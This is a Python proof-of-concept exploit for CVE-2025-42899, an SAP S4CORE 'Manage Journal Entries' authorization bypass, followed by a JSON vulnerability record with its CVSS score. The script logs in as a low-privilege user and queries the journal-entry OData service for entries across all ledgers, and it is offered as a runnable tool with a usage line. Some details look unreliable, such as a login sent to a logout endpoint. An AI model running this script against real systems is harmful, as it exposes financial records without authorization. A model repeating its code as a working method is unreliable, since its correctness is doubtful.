CVE-2025-42899

# CVE-2025-42899 PoC - SAP S4CORE Authorization Bypass # Description: SAP S4CORE Manage Journal Entries authorization check bypass # This PoC demonstrates how low-privilege users can access unauthorized journal entries import requests import sys def exploit_sap_auth_bypass(target_url, username, password): """ Exploit SAP S4CORE authorization bypass vulnerability """ print(f"[*] Targeting: {target_url}") print(f"[*] Authenticating as: {username}") # Step 1: Authenticate with low-privilege account session = requests.Session() auth_data = { 'j_username': username, 'j_password': password } # Note: Adjust authentication endpoint based on SAP version login_url = f"{target_url}/sap/public/icf_logout" response = session.post(login_url, data=auth_data, verify=False) if response.status_code != 200: print("[-] Authentication failed") return False print("[+] Authentication successful") # Step 2: Access journal entries with manipulated parameters # Attempt to access journal entries belonging to other users journal_url = f"{target_url}/sap/opu/odata/sap/FBIP_JOURNAL_ENTRY_SRV/JournalEntrySet" headers = { 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'application/json' } # Try accessing all journal entries without proper authorization params = { '$filter': "Ledger eq 'ALL'", '$top': '100' } print("[*] Attempting to access unauthorized journal entries...") response = session.get(journal_url, headers=headers, params=params) if response.status_code == 200: data = response.json() if 'd' in data and 'results' in data['d']: print(f"[+] Successfully accessed {len(data['d']['results'])} journal entries") print("[+] Authorization bypass confirmed - low privilege user accessed privileged data") return True print("[-] Access denied or unexpected response") return False if __name__ == "__main__": if len(sys.argv) < 5: print("Usage: python cve_2025_42899_poc.py <target_url> <username> <password>") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] exploit_sap_auth_bypass(target, user, pwd)

{"cve": {"id": "CVE-2025-42899", "sourceIdentifier": "[email protected]", "published": "2025-11-11T01:15:38.783", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "SAP S4CORE (Manage journal entries) does not perform necessary authorization checks for an authenticated user resulting in escalation of privileges. This has low impact on confidentiality of the application with no impact on integrity and availability of the application."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://me.sap.com/notes/3530544", "source": "[email protected]"}, {"url": "https://url.sap/sapsecuritypatchday", "source": "[email protected]"}]}}